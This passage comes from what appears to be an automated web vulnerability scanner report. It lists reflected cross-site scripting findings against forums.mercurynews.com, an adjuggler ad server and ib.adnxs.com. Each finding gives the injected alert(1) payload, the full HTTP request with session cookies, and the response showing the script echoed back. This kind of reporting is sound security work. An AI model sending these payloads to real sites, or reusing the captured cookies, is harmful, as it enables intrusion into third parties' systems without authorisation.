Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:06:54 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:18 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23285

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / topic/supreme-court-wont-halt-enforcement-of-dont-ask-dont-tell-policy?20852"-alert(1)-"14a59680a3a=1";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCi
...[SNIP]...

3.118. http://forums.mercurynews.com/topic/war-crisis-in-september [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /topic/war-crisis-in-september

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4a503"-alert(1)-"208a5264286 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic4a503"-alert(1)-"208a5264286/war-crisis-in-september HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:27 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:51 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22136

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
anguage="JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / topic4a503"-alert(1)-"208a5264286/war-crisis-in-september";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageN
...[SNIP]...

3.119. http://forums.mercurynews.com/topic/war-crisis-in-september [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /topic/war-crisis-in-september

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b33de"-alert(1)-"add33b46077 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/war-crisis-in-septemberb33de"-alert(1)-"add33b46077 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:33 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:57 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22136

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
(typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / topic/war-crisis-in-septemberb33de"-alert(1)-"add33b46077";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCiQu
...[SNIP]...

3.120. http://forums.mercurynews.com/topic/war-crisis-in-september [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /topic/war-crisis-in-september

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57abb"-alert(1)-"ea4b545c8c0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topic/war-crisis-in-september?57abb"-alert(1)-"ea4b545c8c0=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:07:18 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:42 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 162532

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
(typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / topic/war-crisis-in-september?57abb"-alert(1)-"ea4b545c8c0=1";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCi
...[SNIP]...

3.121. http://forums.mercurynews.com/xml/comments [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /xml/comments

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34def"-alert(1)-"a6f704bab09 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /xml34def"-alert(1)-"a6f704bab09/comments HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:06:26 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:06:50 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22102

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
language="JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / xml34def"-alert(1)-"a6f704bab09/comments";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaig
...[SNIP]...

3.122. http://forums.mercurynews.com/xml/comments [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /xml/comments

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df349"-alert(1)-"078e172cde1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /xml/commentsdf349"-alert(1)-"078e172cde1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:06:40 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:04 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22102

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
="JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / xml/commentsdf349"-alert(1)-"078e172cde1";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCiQu
...[SNIP]...

3.123. http://forums.mercurynews.com/xml/comments [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /xml/comments

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1a8b"-alert(1)-"d726d012b6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /xml/comments?c1a8b"-alert(1)-"d726d012b6=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:06:19 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:06:43 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22068

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
"JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / xml/comments?c1a8b"-alert(1)-"d726d012b6=1";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCi
...[SNIP]...

3.124. http://forums.mercurynews.com/xml/poll-link [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /xml/poll-link

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ff9b"-alert(1)-"3afa300d7b5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /xml2ff9b"-alert(1)-"3afa300d7b5/poll-link HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:06:46 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:10 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22104

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
language="JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / xml2ff9b"-alert(1)-"3afa300d7b5/poll-link";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campai
...[SNIP]...

3.125. http://forums.mercurynews.com/xml/poll-link [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /xml/poll-link

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4083"-alert(1)-"6c029440ed4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /xml/poll-linka4083"-alert(1)-"6c029440ed4 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:07:00 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:24 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22104

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
"JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / xml/poll-linka4083"-alert(1)-"6c029440ed4";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCiQu
...[SNIP]...

3.126. http://forums.mercurynews.com/xml/poll-link [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /xml/poll-link

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82efb"-alert(1)-"694f25fe67 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /xml/poll-link?82efb"-alert(1)-"694f25fe67=1 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:06:34 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:06:58 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22070

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / xml/poll-link?82efb"-alert(1)-"694f25fe67=1";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCi
...[SNIP]...

3.127. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hpi.rotator.hadj7.adjuggler.net
Path:   /servlet/ajrotator/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 11905<script>alert(1)</script>ed7f0af6221 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet11905<script>alert(1)</script>ed7f0af6221/ajrotator/ HTTP/1.1
Host: hpi.rotator.hadj7.adjuggler.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Mon, 15 Nov 2010 02:07:45 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /servlet11905<script>alert(1)</script>ed7f0af6221/ajrotator/ not found</pre>
<BR>

3.128. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hpi.rotator.hadj7.adjuggler.net
Path:   /servlet/ajrotator/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2c2fc<script>alert(1)</script>bfbfed47bf1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet/ajrotator2c2fc<script>alert(1)</script>bfbfed47bf1/ HTTP/1.1
Host: hpi.rotator.hadj7.adjuggler.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Mon, 15 Nov 2010 02:07:45 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /servlet/ajrotator2c2fc<script>alert(1)</script>bfbfed47bf1/ not found</pre>
<BR>

3.129. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/65636/0/vj [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hpi.rotator.hadj7.adjuggler.net
Path:   /servlet/ajrotator/65636/0/vj

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload df060<script>alert(1)</script>065331fd6cc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servletdf060<script>alert(1)</script>065331fd6cc/ajrotator/65636/0/vj?ajecscp=1289789123079&z=hpi&dim=63359&pos=1&pv=6400709303958913&nc=24682365 HTTP/1.1
Accept: */*
Referer: http://newspaperads.mercurynews.com/ROP/ads.aspx?advid=36689
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: hpi.rotator.hadj7.adjuggler.net
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: optin=Aa

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Mon, 15 Nov 2010 03:52:19 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /servletdf060<script>alert(1)</script>065331fd6cc/ajrotator/65636/0/vj not found</pre>
<BR>

3.130. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/65636/0/vj [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hpi.rotator.hadj7.adjuggler.net
Path:   /servlet/ajrotator/65636/0/vj

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 760f3<script>alert(1)</script>595ff3ead2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet/ajrotator760f3<script>alert(1)</script>595ff3ead2/65636/0/vj?ajecscp=1289789123079&z=hpi&dim=63359&pos=1&pv=6400709303958913&nc=24682365 HTTP/1.1
Accept: */*
Referer: http://newspaperads.mercurynews.com/ROP/ads.aspx?advid=36689
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: hpi.rotator.hadj7.adjuggler.net
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: optin=Aa

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Mon, 15 Nov 2010 03:52:20 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /servlet/ajrotator760f3<script>alert(1)</script>595ff3ead2/65636/0/vj not found</pre>
<BR>

3.131. http://ib.adnxs.com/ttj [pubclick parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ttj

Issue detail

The value of the pubclick request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 30b7c'-alert(1)-'7a94292f04 was submitted in the pubclick parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ttj?id=188804&pubclick=http://optimized-by.rubiconproject.com/t/5833/7750/0-9.3176628.3191651?url=30b7c'-alert(1)-'7a94292f04 HTTP/1.1
Accept: */*
Referer: http://www.mercurynews.com/opinion
Accept-Language: en-US
